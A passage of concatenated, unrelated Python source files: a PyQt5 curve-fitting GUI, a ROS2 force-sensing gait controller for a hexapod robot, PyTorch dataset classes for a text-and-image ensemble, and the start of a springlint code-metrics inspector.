super(Mainwindow, self).__init__(parent)
self.setupUi(self)
self.show()
self.show_residuals = True
# # 设置图像框
self.Xlabel = None
self.Ylabel = None
self.sc = MplCanvas(self, width=5, height=4, dpi=100, show_residuals=self.show_residuals)
self.sc.axes.grid(True)
self.toolbar = NavigationToolbar(self.sc, self)
self.gridLayout_3.addWidget(self.sc)
self.gridLayout_3.addWidget(self.toolbar)
# 设置帮助、关于以及输入窗口,以及设置各种信号的连接
self.rawVariables = rawVariables
self.showvars()
self.aboutwindow = Aboutwindow()
self.helpwindow = Helpwindow()
self.inputwindow_title = Inputwindow()
self.inputwindow_title.pushButton.clicked.connect(self.inputtitleback)
self.inputwindow_xlabel = Inputwindow()
self.inputwindow_xlabel.pushButton.clicked.connect(self.inputXlabelback)
self.inputwindow_ylabel = Inputwindow()
self.inputwindow_ylabel.pushButton.clicked.connect(self.inputYlabelback)
self.signalchannels()
# 设置拟合选项comboBox
self.comboBox_3.setCurrentIndex(4)
self.stackedWidget.setCurrentIndex(4)
self.findcombo = {'0': [self.lineEdit_2, self.lineEdit_3, self.textEdit_2], '1': self.comboBox_5,
'2': self.comboBox_6, '3': self.comboBox_7, '4': self.comboBox_4, '5': self.comboBox_8,
'6': [self.comboBox_9, self.comboBox_10], '7': self.comboBox_11}
self.findlabel = {'1': self.label_11, '2': self.label_13, '3': self.label_15, '5': self.label_19,
'6': self.label_22, '7': self.label_26}
# 设置翻译
self.translator = QtCore.QTranslator()
config = configparser.ConfigParser()
config.read(os.path.expanduser('~') + os.sep + 'curvefitting.ini')
self.language = config['DEFAULT'].get('language', "en")
if self.language == 'en':
self.translate("en", nomatter=True)
else:
self.action_English.setIconVisibleInMenu(False)
# 自动拟合的设置
if config['DEFAULT'].get('autofit', "False") == "False":
self.autofit = False
self.action_12.setIconVisibleInMenu(False)
else:
self.autofit = True
self.checkBox.setChecked(True)
def signalchannels(self):
# 各种信号槽的搭建
self.comboBox.currentIndexChanged.connect(self.plot)
self.comboBox.currentIndexChanged.connect(self.renew_xylabel)
self.comboBox_2.currentIndexChanged.connect(self.plot)
self.comboBox_2.currentIndexChanged.connect(self.renew_xylabel)
self.pushButton.clicked.connect(self.goodfit)
self.checkBox.stateChanged.connect(self.setCheckBox)
self.pushButton_2.setDisabled(True)
self.pushButton_4.clicked.connect(self.printfigure)
self.action_3.triggered.connect(self.printfigure)
self.pushButton_5.clicked.connect(self.savefigure)
self.action_7.triggered.connect(self.savefigure)
self.action_5.triggered.connect(self.close)
self.action_Chinese.triggered.connect(lambda: self.translate("zh_CN"))
self.action_English.triggered.connect(lambda: self.translate("en"))
self.action_11.triggered.connect(self.aboutwindow.show)
self.action_10.triggered.connect(self.helpwindow.show)
self.action_12.triggered.connect(self.action_autofit)
self.action_8.triggered.connect(self.inputtitle)
self.actionX.triggered.connect(self.inputXlabel)
self.actionY.triggered.connect(self.inputYlabel)
self.action.triggered.connect(self.clear)
self.pushButton_2.clicked.connect(self.stopfitting)
self.comboBox_3.currentIndexChanged.connect(self.showfitoption)
self.comboBox_5.currentIndexChanged.connect(self.showfunction)
self.comboBox_6.currentIndexChanged.connect(self.showfunction)
self.comboBox_7.currentIndexChanged.connect(self.showfunction)
self.comboBox_8.currentIndexChanged.connect(self.showfunction)
self.comboBox_9.currentIndexChanged.connect(self.showfunction)
self.comboBox_10.currentIndexChanged.connect(self.showfunction)
self.comboBox_11.currentIndexChanged.connect(self.showfunction)
self.pushButton_3.clicked.connect(self.printresult)
self.action_2.triggered.connect(self.printresult)
def translate(self, language, nomatter=False):
if (self.language != language) or nomatter:
self.translator.load(language_path + "MainWindow_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
self.aboutwindow.translate(language)
self.helpwindow.translate(language)
self.inputwindow_title.translate(language)
self.inputwindow_xlabel.translate(language)
self.inputwindow_ylabel.translate(language)
self.language = language
if language == "en":
self.action_English.setIconVisibleInMenu(True)
self.action_Chinese.setIconVisibleInMenu(False)
elif language == "zh_CN":
self.action_English.setIconVisibleInMenu(False)
self.action_Chinese.setIconVisibleInMenu(True)
def showvars(self):
# 负责筛选合适的变量,并显示在comboBox中
keys_ = list(self.rawVariables.keys())
variables = []
for i_ in keys_:
if not i_.startswith('_') and str(type(self.rawVariables[i_]))[8:-2] in ['int', 'float', 'list', 'tuple',
'numpy.ndarray'] \
and not i_ in ['In', 'variables']:
variables.append(i_)
del i_, keys_
text1 = self.comboBox.currentText()
text2 = self.comboBox_2.currentText()
self.comboBox.clear()
self.comboBox_2.clear()
self.comboBox.addItems(variables)
self.comboBox_2.addItems(variables)
self.comboBox.setCurrentText(text1)
self.comboBox_2.setCurrentText(text2)
def plot(self):
# 绘制散点图
text1 = self.comboBox.currentText()
text2 = self.comboBox_2.currentText()
try:
x, y = eval(text1, self.rawVariables), eval(text2, self.rawVariables)
if type(x) != type(y):
self.messege(
"无法绘制!\nX与Y的数据类型不同" if self.language == "zh_CN" else "Cannot plot!\nX and Y have different data types")
elif len(x) != len(y):
self.messege(
"无法绘制!\nX与Y的维度不同" if self.language == "zh_CN" else "Cannot plot!\nX and Y have different dimensions")
else:
self.full_x = x
self.full_y = y
self.sc.axes.clear()
self.sc.axes.scatter(x, y, s=5, c='k', label='Raw data', picker=True, pickradius=1)
self.outliers = np.zeros(x.shape).astype(bool)
self.sc.mpl_connect('pick_event', self.outlier_pick)
self.sc.draw()
if self.autofit:
self.goodfit()
except Exception as e:
self.messege(repr(e))
def messege(self, e):
msg_box = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Warning, 'Warning', e)
msg_box.exec_()
def setCheckBox(self):
# checkBox状态发生变化时进行的设置
combos = (self.comboBox_3, self.comboBox_4, self.comboBox_5, self.comboBox_6, self.comboBox_7,
self.comboBox_8, self.comboBox_9, self.comboBox_10, self.comboBox_11)
if self.checkBox.isChecked():
self.autofit = True
self.plot()
self.pushButton.setDisabled(True)
self.pushButton_2.setDisabled(True)
for combo in combos:
combo.currentIndexChanged.connect(self.plot)
self.action_12.setIconVisibleInMenu(True)
else:
self.autofit = False
self.pushButton.setDisabled(False)
for combo in combos:
combo.currentIndexChanged.disconnect(self.plot)
self.action_12.setIconVisibleInMenu(False)
def findfitmod(self):
# 生成fit输入参数
index = self.comboBox_3.currentIndex()
if index == 0:
edits = self.findcombo['0']
value = [edits[0].text(), edits[1].text(), edits[2].toPlainText()]
elif index == 6:
value = [i.currentIndex() for i in self.findcombo['6']]
elif index == 8:
value = 0
else:
value = self.findcombo[str(index)].currentIndex()
self.fitmod = (index, value)
def goodfit(self, outliers=None):
# 拟合接口函数
if not self.autofit:
self.pushButton.setDisabled(True)
self.plot()
self.pushButton_2.setDisabled(False)
self.text1 = self.comboBox.currentText()
self.text2 = self.comboBox_2.currentText()
try:
self.findfitmod()
self.x, self.y = eval(self.text1, self.rawVariables), eval(self.text2, self.rawVariables)
if outliers is not None:
self.x = self.x[np.logical_not(outliers)]
self.y = self.y[np.logical_not(outliers)]
# 激发线程
self.workthread = WorkThread([self])
self.workthread.trigger.connect(self.goodfitback)
self.workthread.start()
except Exception as e:
self.messege(repr(e))
def goodfitback(self):
# 把fit操作放在一个线程里,结束后触发的恢复按钮状态的操作
if self.successfit:
try:
self.textEdit.setText("")
text = give_reflect(self.x, self.y, self.p, self.para, self.para_names, self.fitmod, self.language)
for i in text:
self.textEdit.append(i)
except Exception as e:
self.messege(repr(e))
else:
self.messege(self.e)
pass
self.update_figure()
if not self.autofit:
self.pushButton.setDisabled(False)
self.pushButton_2.setDisabled(True)
def update_figure(self):
xx = (self.x.min(), self.x.max())
self.sc.axes.clear()
self.sc.axes.grid(True)
self.sc.axes.scatter(self.full_x, self.full_y, s=5, c='k', label='Raw data', picker=True, pickradius=2)
if np.sum(self.outliers) > 0:
self.sc.axes.scatter(self.full_x[self.outliers], self.full_y[self.outliers], s=50, marker='x', c='r', label='Outliers')
self.sc.axes.plot(np.linspace(xx[0], xx[1], 200), self.p(np.linspace(xx[0], xx[1], 200), *self.para), label='Fit')
self.sc.axes.set_xlabel(self.text1)
self.sc.axes.set_ylabel(self.text2)
self.sc.axes.legend()
if self.show_residuals:
self.sc.residuals.clear()
self.sc.residuals.set_title('Residuals')
self.sc.residuals.grid(True)
self.sc.residuals.plot(xx, [0,0], linestyle=':', label='Baseline')
deviations = self.y-self.p(self.x, *self.para)
self.sc.residuals.scatter(self.x, deviations, c='k', s=2, label='Residuals')
self.sc.residuals.set_xlabel(self.text1)
self.sc.residuals.set_ylabel(self.text2)
y_zeros = np.zeros(self.x.shape)
for x_0, y_0, y_dev in zip(self.x, y_zeros, deviations):
# print(y_dev)
try:
if y_dev > 0:
plot_color = 'g'
else:
plot_color = 'r'
self.sc.residuals.plot([x_0, x_0], [y_0, y_dev], c=plot_color)
except:
pass
self.sc.residuals.legend()
self.sc.setMinimumHeight(400)
self.sc.setMinimumWidth(400)
self.sc.mpl_connect('pick_event', self.outlier_pick)
self.sc.draw()
def outlier_pick(self, event):
ind = event.ind
point = tuple(zip(self.full_x[ind], self.full_y[ind]))
self.outliers[ind] = not self.outliers[ind]
# print('onpick point:', point, self.outliers)
if self.autofit:
self.goodfit(outliers=self.outliers)
self.update_figure()
def stopfitting(self):
# 停止拟合
self.workthread.terminate()
self.workthread.wait()
if not self.autofit:
self.pushButton.setDisabled(False)
self.pushButton_2.setDisabled(True)
def showfitoption(self):
# 将stackedWidget与相应拟合模式相绑定
self.stackedWidget.setCurrentIndex(self.comboBox_3.currentIndex())
def showfunction(self):
# 设置label为表示当前方程的字符串
self.findfitmod()
text = show_function(self.fitmod)[7:]
label = self.findlabel[str(self.fitmod[0])]
label.setToolTip(text)
room = int(label.width() / 5.5)
if len(text) > room:
text = text[:room - 4] + '...'
label.setText(text)
def printresult(self):
# 输出拟合结果
if self.fitmod[0] == 0:
text_func = "f({}) = ".format(self.fitmod[1][1]) + self.fitmod[1][2]
else:
text_func = show_function(self.fitmod)
if self.fitmod[0] == 4:
for i in range(self.fitmod[1] + 2):
text_func = text_func.replace("p{}".format(i + 1), str(round(self.p[self.fitmod[1] + 1 - i], 2)))
else:
for i in range(len(self.para)):
text_func = text_func.replace(self.para_names[i], str(round(self.para[i], 2)))
print(text_func)
def printfigure(self):
try:
if self.language == "zh_CN":
plt.rcParams['font.sans-serif'] = 'SimHei'
plt.rcParams['axes.unicode_minus'] = False
xx = (self.x.min(), self.x.max())
plt.plot(np.linspace(xx[0], xx[1], 200), self.p(np.linspace(xx[0], xx[1], 200), *self.para))
plt.scatter(self.x, self.y, c='k')
plt.gcf().set_facecolor(np.ones(3) * 240 / 255)
plt.grid()
if self.Xlabel:
self.text1 = self.Xlabel
if self.Ylabel:
self.text2 = self.Ylabel
plt.legend([self.lineEdit.text(), "{} vs. {}".format(self.text2, self.text1)])
plt.title(self.lineEdit.text())
plt.xlabel(self.text1)
plt.ylabel(self.text2)
plt.show()
except Exception as e:
self.messege(repr(e))
def savefigure(self):
fileName, fileType = QtWidgets.QFileDialog.getSaveFileName(self,
"保存文件" if self.language == "zh_CN" else "Save file",
os.getcwd(),
"Portable Network Graphics(*.png);;Joint Photographic Group(*.jpg);;All Files(*)")
if fileName:
self.sc.axes.figure.savefig(fileName, dpi=300)
def action_autofit(self):
if self.checkBox.isChecked():
self.checkBox.setChecked(False)
self.action_12.setIconVisibleInMenu(False)
else:
self.checkBox.setChecked(True)
self.action_12.setIconVisibleInMenu(True)
def closeEvent(self, event):
config = configparser.ConfigParser()
config['DEFAULT'] = {"language": self.language, "autofit": str(self.checkBox.isChecked())}
with open(os.path.expanduser('~') + os.sep + 'curvefitting.ini', 'w') as configfile:
config.write(configfile)
event.accept()
def inputtitle(self):
self.inputwindow_title.lineEdit.setText(self.lineEdit.text())
self.inputwindow_title.show()
def inputtitleback(self):
title = self.inputwindow_title.inputvalue
if title:
self.lineEdit.setText(title)
def inputXlabel(self):
if self.Xlabel:
self.inputwindow_xlabel.lineEdit.setText(self.Xlabel)
else:
self.inputwindow_xlabel.lineEdit.setText(self.comboBox.currentText())
self.inputwindow_xlabel.show()
def inputXlabelback(self):
xlabel = self.inputwindow_xlabel.inputvalue
if xlabel:
self.Xlabel = xlabel
def inputYlabel(self):
if self.Ylabel:
self.inputwindow_ylabel.lineEdit.setText(self.Ylabel)
else:
self.inputwindow_ylabel.lineEdit.setText(self.comboBox_2.currentText())
self.inputwindow_ylabel.show()
def inputYlabelback(self):
ylabel = self.inputwindow_ylabel.inputvalue
if ylabel:
self.Ylabel = ylabel
def renew_xylabel(self):
self.Xlabel = None
self.Ylabel = None
def clear(self):
self.comboBox.setCurrentIndex(0)
self.comboBox_2.setCurrentIndex(0)
self.comboBox_3.setCurrentIndex(0)
self.comboBox_4.setCurrentIndex(0)
self.sc.clear()
self.renew_xylabel()
self.translate(self.language, nomatter=True)
del self.x, self.y, self.p, self.text1, self.text2
class WorkThread(QtCore.QThread):
# 专为拟合而生的线程
trigger = QtCore.pyqtSignal()
def __init__(self, myui):
super(WorkThread, self).__init__()
[self.ui] = myui
def run(self):
self.ui.successfit = False
try:
self.ui.p, self.ui.para, self.ui.para_names = fit(self.ui.x.squeeze(), self.ui.y.squeeze(), mod=self.ui.fitmod)
except Exception as e:
self.ui.e = repr(e)
else:
self.ui.successfit = True
self.trigger.emit()
class Aboutwindow(QtWidgets.QWidget, Ui_aboutWindow):
def __init__(self, parent=None):
super(Aboutwindow, self).__init__(parent)
self.setupUi(self)
self.translator = QtCore.QTranslator()
def translate(self, language):
self.translator.load(language_path + "about_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
class Helpwindow(QtWidgets.QWidget, Ui_helpWindow):
def __init__(self, parent=None):
super(Helpwindow, self).__init__(parent)
self.setupUi(self)
self.translator = QtCore.QTranslator()
def translate(self, language):
self.translator.load(language_path + "help_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
class Inputwindow(QtWidgets.QWidget, Ui_inputWindow):
def __init__(self, parent=None):
super(Inputwindow, self).__init__(parent)
self.setupUi(self)
self.translator = QtCore.QTranslator()
self.inputvalue = None
self.pushButton.clicked.connect(self.OK)
self.pushButton_2.clicked.connect(self.close)
def OK(self):
self.inputvalue = self.lineEdit.text()
self.close()
def translate(self, language):
self.translator.load(language_path + "input_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
|
#!/usr/bin/env python3
# 参考:
# https://github.com/ros2/examples/tree/master/rclpy/actions
from action_msgs.msg import GoalStatus
from hapthexa_msgs.action import MoveLeg
from hapthexa_msgs.msg import ForceSensor
from hapthexa_msgs.msg import Empty
from hapthexa_msgs.action import Gait
import math
import threading
import time
import sys
import rclpy
from rclpy.action import ActionServer, ActionClient, CancelResponse, GoalResponse
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.executors import MultiThreadedExecutor
from rclpy.node import Node
from rclpy.task import Future
# phase = 0
# def forcesensor_callback(msg, node):
# # node.get_logger().info('{0}'.format(msg.z))
# if phase == 2 and msg.radial_magnitude > 0.3:
# node.get_logger().info('z detected')
# future = goal_handle.cancel_goal_async()
# future.add_done_callback(lambda future: cancel_done(node, future))
# global once_failed
# once_failed = True
# def cancel_done(node, future):
# cancel_response = future.result()
# if len(cancel_response.goals_canceling) > 0:
# node.get_logger().info('Goal successfully canceled')
# else:
# node.get_logger().info('Goal failed to cancel')
class EachLegGait(Node):
def __init__(self, namespace: str = None):
super().__init__('each_leg_gait', namespace=namespace)
self._gait_action_server = ActionServer(
self,
Gait,
'gait',
execute_callback=self.execute_callback,
callback_group=ReentrantCallbackGroup(),
goal_callback=self.goal_callback,
cancel_callback=self.cancel_callback)
self._calibrate_signal_pub = self.create_publisher(Empty, 'calibrate_signal', 10)
self._move_leg_action_client = ActionClient(self, MoveLeg, 'move_leg')
self._forcesensor_sub = self.create_subscription(ForceSensor, 'force_sensor', self.forcesensor_callback, 10)
# self._timer = self.create_timer(0.001, lambda: self.get_logger().info('timer'))
self._leg_stop_condition = (lambda: False)
self._leg_stoped = False
self._move_leg_goal_handle = None
self._forcesensor_msg = None
self._x_result = 0.0
self._y_result = 0.0
self._z_result = 0.0
self._z_lock = 0.0
self._x_offset = 0
self._z_offset = 0.0
self._timer_start = time.time()
def goal_callback(self, goal_request):
"""Accept or reject a client request to begin an action."""
# This server allows multiple goals in parallel
self.get_logger().debug('Received goal request')
return GoalResponse.ACCEPT
def cancel_callback(self, goal_handle):
"""Accept or reject a client request to cancel an action."""
self.get_logger().debug('Received cancel request')
return CancelResponse.ACCEPT
async def execute_callback(self, goal_handle):
"""Execute a goal."""
self.get_logger().debug('Executing goal...')
w = 5.0 if math.isclose(goal_handle.request.w,0.0) else goal_handle.request.w
h = 5.0 if math.isclose(goal_handle.request.h,0.0) else goal_handle.request.h
hmax = 12.0 if math.isclose(goal_handle.request.hmax,0.0) else goal_handle.request.hmax
hmin = -12.0 if math.isclose(goal_handle.request.hmin,0.0) else goal_handle.request.hmin
phase = goal_handle.request.phase
self._z_offset = goal_handle.request.z_offset
self.get_logger().debug('phase={0}'.format(phase))
if goal_handle.request.is_swingleg:
if phase == 1:
self.move_leg_and_wait(-w/2+self._x_offset, 0, h+self._z_lock)
self._calibrate_signal_pub.publish(Empty())
elif phase == 2:
if self.move_leg_and_wait( w/2+self._x_offset, 0, h+self._z_lock, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Wall detected. retrying...')
self.move_leg_and_wait(-w/2+self._x_offset, 0, hmax+self._z_lock)
self._calibrate_signal_pub.publish(Empty())
if self.move_leg_and_wait( w/2+self._x_offset, 0, hmax+self._z_lock, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Wall detected twice. stop')
rclpy.shutdown()
sys.exit()
elif phase == 3:
if not self.move_leg_and_wait( w/2+self._x_offset, 0, hmin, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Cannot ground. retrying...(1)')
self.move_leg_and_wait(w/2+self._x_offset, 0, h+self._z_lock)
self._x_offset = -3 if self._x_offset == 3 else self._x_offset + 3
self.move_leg_and_wait( w/2+self._x_offset, 0, h+self._z_lock) #phase2動作
if not self.move_leg_and_wait( w/2+self._x_offset, 0, hmin, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Cannot ground. retrying...(2)')
self.move_leg_and_wait(w/2+self._x_offset, 0, h+self._z_lock)
self._x_offset = -3 if self._x_offset == 3 else self._x_offset + 3
self.move_leg_and_wait( w/2+self._x_offset, 0, h+self._z_lock) #phase2動作
if not self.move_leg_and_wait( w/2+self._x_offset, 0, hmin, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Cannot ground. stop')
rclpy.shutdown()
sys.exit()
self._z_lock = self._z_result
else:
self.move_leg_and_wait( w/2+self._x_offset, 0, self._z_lock)
self.move_leg_and_wait(-w/2+self._x_offset, 0, self._z_lock)
self.move_leg_and_wait(-w/2+self._x_offset, 0, self._z_lock)
goal_handle.succeed()
self.get_logger().debug('Action succeed')
result = Gait.Result()
result.x = self._x_result
result.y = self._y_result
result.z = self._z_result
return result
def move_leg_and_wait(self, x, y, z, stop_condition=(lambda: False)):
self._move_leg_action_client.wait_for_server()
goal_msg = MoveLeg.Goal()
goal_msg.x = float(x)
goal_msg.y = float(y)
goal_msg.z = float(z+self._z_offset)
goal_msg.relative_mode = True
send_goal_future = self._move_leg_action_client.send_goal_async(goal_msg)
# rclpy.spin_until_future_complete(self, send_goal_future)
while not send_goal_future.done():
time.sleep(0.01)
pass
self._move_leg_goal_handle = send_goal_future.result()
self._leg_stop_condition = stop_condition
self._leg_stoped = False
self._timer_start = time.time()
get_result_future = self._move_leg_goal_handle.get_result_async()
# rclpy.spin_until_future_complete(self, get_result_future)
while not get_result_future.done():
time.sleep(0.01)
pass
result = get_result_future.result().result
self._x_result = result.x
self._y_result = result.y
self._z_result = result.z
self.get_logger().debug('z={0}'.format(self._z_result))
self._move_leg_goal_handle = None
self._leg_stop_condition = (lambda: False)
return self._leg_stoped
def forcesensor_callback(self, msg):
self._forcesensor_msg = msg
if self._move_leg_goal_handle is not None and not self._leg_stoped and self._leg_stop_condition():
self.get_logger().debug('{0}'.format(msg.z))
future = self._move_leg_goal_handle.cancel_goal_async()
future.add_done_callback(lambda future: self.cancel_done(future))
self._leg_stoped = True
def cancel_done(self, future):
cancel_response = future.result()
if len(cancel_response.goals_canceling) > 0:
self.get_logger().info('Goal successfully canceled')
else:
self.get_logger().info('Goal failed to cancel')
class RoughWalk(Node):
def __init__(self):
super().__init__('roughwalk',namespace='hapthexa')
self._leg_names = ['front_left', 'middle_left', 'rear_left', 'rear_right', 'middle_right', 'front_right']
self._gait_action_clients = []
for leg_name in self._leg_names:
self._gait_action_clients.append(ActionClient(self, Gait, 'leg/'+leg_name+'/gait'))
self._leg_group1 = []
self._leg_group2 = []
for i in range(len(self._leg_names)):
if i % 2:
self._leg_group1.append(self._leg_names[i])
else:
self._leg_group2.append(self._leg_names[i])
self.get_logger().debug('{0}'.format(len(self._leg_names)))
self._send_goal_futures = [Future]*len(self._leg_names)
self._get_result_futures = [Future]*len(self._leg_names)
self._executing_action = [False]*len(self._leg_names)
self._move_leg_action_client = ActionClient(self, MoveLeg, 'leg/front_left/move_leg')
self._z_offset = 0
self._walk_thread = threading.Thread(target=self.walk_thread)
self._walk_thread.start()
def walk_thread(self):
while rclpy.ok():
self.walk(True)
self.walk(False)
def walk(self, is_group1_true: bool=True):
for i in range(len(self._leg_names)):
self._gait_action_clients[i].wait_for_server()
msg = Gait.Goal()
msg.z_offset = float(self._z_offset)
# msg.is_swingleg = is_group1_true
# self.execute_gait(0, msg)
# self.execute_gait(2, msg)
# self.execute_gait(4, msg)
# msg.is_swingleg = not is_group1_true
# self.execute_gait(1, msg)
# self.execute_gait(3, msg)
# self.execute_gait(5, msg)
# self.wait_for_gait()
self.get_logger().debug('group1' if is_group1_true else 'group2')
if is_group1_true:
msg.is_swingleg = True
msg.phase = 1
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
self.wait_for_gait()
msg.is_swingleg = False
msg.phase = 0
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 2
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 3
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
self.wait_for_gait()
else:
msg.is_swingleg = True
msg.phase = 1
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
msg.is_swingleg = False
msg.phase = 0
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
msg.is_swingleg = True
msg.phase = 2
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 3
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
if is_group1_true:
self._z_offset = -(self._get_result_futures[0].result().result.z+self._get_result_futures[2].result().result.z+self._get_result_futures[4].result().result.z)/3
else:
self._z_offset = -(self._get_result_futures[1].result().result.z+self._get_result_futures[3].result().result.z+self._get_result_futures[5].result().result.z)/3
def execute_gait(self, n, msg):
self._send_goal_futures[n] = self._gait_action_clients[n].send_goal_async(msg)
self._executing_action[n] = True
def wait_for_gait(self):
for i in range(len(self._leg_names)):
if self._executing_action[i]:
while not self._send_goal_futures[i].done():
time.sleep(0.01)
for i in range(len(self._leg_names)):
if self._executing_action[i]:
self._get_result_futures[i] = self._send_goal_futures[i].result().get_result_async()
for i in range(len(self._leg_names)):
if self._executing_action[i]:
while not self._get_result_futures[i].done():
time.sleep(0.01)
self._executing_action[i] = False
def main(args=None):
rclpy.init(args=args)
leg_names = ['front_left', 'middle_left', 'rear_left', 'rear_right', 'middle_right', 'front_right']
executor = MultiThreadedExecutor(num_threads=8) # EachLegGaitノード6スレッド+RoughWalkノード1スレッド+1スレッド
for leg_name in leg_names:
executor.add_node(EachLegGait(namespace='hapthexa/leg/'+leg_name))
executor.add_node(RoughWalk())
executor.spin()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
import numpy as np
from PIL import Image
import torch
from torch.utils.data import Dataset
from octopod.vision.config import cropped_transforms, full_img_transforms
from octopod.vision.helpers import center_crop_pil_image
class OctopodEnsembleDataset(Dataset):
"""
Load image and text data specifically for an ensemble model
Parameters
----------
text_inputs: pandas Series
the text to be used
img_inputs: pandas Series
the paths to images to be used
y: list
A list of lists of dummy-encoded categories
tokenizer: pretrained BERT Tokenizer
BERT tokenizer likely from `transformers`
max_seq_length: int (defaults to 128)
Maximum number of tokens to allow
transform: str or list of PyTorch transforms
specifies how to preprocess the full image for a Octopod image model
To use the built-in Octopod image transforms, use the strings: `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
crop_transform: str or list of PyTorch transforms
specifies how to preprocess the center cropped image for a Octopod image model
To use the built-in Octopod image transforms, use strings `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
"""
def __init__(self,
text_inputs,
img_inputs,
y,
tokenizer,
max_seq_length=128,
transform='train',
crop_transform='train'):
self.text_inputs = text_inputs
self.img_inputs = img_inputs
self.y = y
self.tokenizer = tokenizer
self.max_seq_length = max_seq_length
if transform == 'train' or 'val':
self.transform = full_img_transforms[transform]
else:
self.transform = transform
if crop_transform == 'train' or 'val':
self.crop_transform = cropped_transforms[crop_transform]
else:
self.crop_transform = crop_transform
def __getitem__(self, index):
"""Return dict of PyTorch tensors for preprocessed images and text and tensor of labels"""
# Text processing
x_text = self.text_inputs[index].replace('\n', ' ').replace('\r', ' ')
tokenized_x = (
['[CLS]']
+ self.tokenizer.tokenize(x_text)[:self.max_seq_length - 2]
+ ['[SEP]']
)
input_ids = self.tokenizer.convert_tokens_to_ids(tokenized_x)
padding = [0] * (self.max_seq_length - len(input_ids))
input_ids += padding
assert len(input_ids) == self.max_seq_length
bert_text = torch.from_numpy(np.array(input_ids))
# Image processing
full_img = Image.open(self.img_inputs[index]).convert('RGB')
cropped_img = center_crop_pil_image(full_img)
full_img = self.transform(full_img)
cropped_img = self.crop_transform(cropped_img)
y_output = torch.from_numpy(np.array(self.y[index])).long()
return {'bert_text': bert_text,
'full_img': full_img,
'crop_img': cropped_img}, y_output
def __len__(self):
return len(self.text_inputs)
class OctopodEnsembleDatasetMultiLabel(OctopodEnsembleDataset):
"""
Multi label subclass of OctopodEnsembleDataset
Parameters
----------
text_inputs: pandas Series
the text to be used
img_inputs: pandas Series
the paths to images to be used
y: list
a list of binary encoded categories with length equal to number of
classes in the multi-label task. For a 4 class multi-label task
a sample list would be [1,0,0,1]
tokenizer: pretrained BERT Tokenizer
BERT tokenizer likely from `transformers`
max_seq_length: int (defaults to 128)
Maximum number of tokens to allow
transform: str or list of PyTorch transforms
specifies how to preprocess the full image for a Octopod image model
To use the built-in Octopod image transforms, use the strings: `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
crop_transform: str or list of PyTorch transforms
specifies how to preprocess the center cropped image for a Octopod image model
To use the built-in Octopod image transforms, use strings `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
"""
def __getitem__(self, index):
"""Return dict of PyTorch tensors for preprocessed images and text and tensor of labels"""
# Text processing
x_text = self.text_inputs[index].replace('\n', ' ').replace('\r', ' ')
tokenized_x = (
['[CLS]']
+ self.tokenizer.tokenize(x_text)[:self.max_seq_length - 2]
+ ['[SEP]']
)
input_ids = self.tokenizer.convert_tokens_to_ids(tokenized_x)
padding = [0] * (self.max_seq_length - len(input_ids))
input_ids += padding
assert len(input_ids) == self.max_seq_length
bert_text = torch.from_numpy(np.array(input_ids))
# Image processing
full_img = Image.open(self.img_inputs[index]).convert('RGB')
cropped_img = center_crop_pil_image(full_img)
full_img = self.transform(full_img)
cropped_img = self.crop_transform(cropped_img)
y_output = torch.FloatTensor(self.y[index])
return {'bert_text': bert_text,
'full_img': full_img,
'crop_img': cropped_img}, y_output
|
import json
import logging
import re
from pathlib import Path
from shutil import copy
from typing import AnyStr, List, Optional, Dict, Any
from src.python.review.common.file_system import new_temp_dir
from src.python.review.common.subprocess_runner import run_in_subprocess
from src.python.review.inspectors.base_inspector import BaseInspector
from src.python.review.inspectors.inspector_type import InspectorType
from src.python.review.inspectors.issue import BaseIssue, ChildrenNumberIssue, ClassResponseIssue, CodeIssue, \
CohesionIssue, \
CouplingIssue, InheritanceIssue, IssueType, MethodNumberIssue, WeightedMethodIssue, IssueData
from src.python.review.inspectors.tips import get_child_number_tip, get_class_coupling_tip, get_class_response_tip, \
get_cohesion_tip, get_inheritance_depth_tip, get_method_number_tip, get_weighted_method_tip
PATH_TOOLS_SPRINGLINT_FILES = Path(__file__).parent / 'files'
PATH_SPRINGLINT_JAR = PATH_TOOLS_SPRINGLINT_FILES / 'springlint-0.6.jar'
SPRINGLINT_OUTPUT_NAME = 'springlint-result.html'
logger = logging.getLogger(__name__)
class SpringlintInspector(BaseInspector):
inspector_type = InspectorType.SPRINGLINT
metric_name_to_property = {
'dit': 'inheritance_tree_depth',
'noc': 'children_number',
'wmc': 'weighted_method',
'cbo': 'class_objects_coupling',
'lcom': 'cohesion_lack',
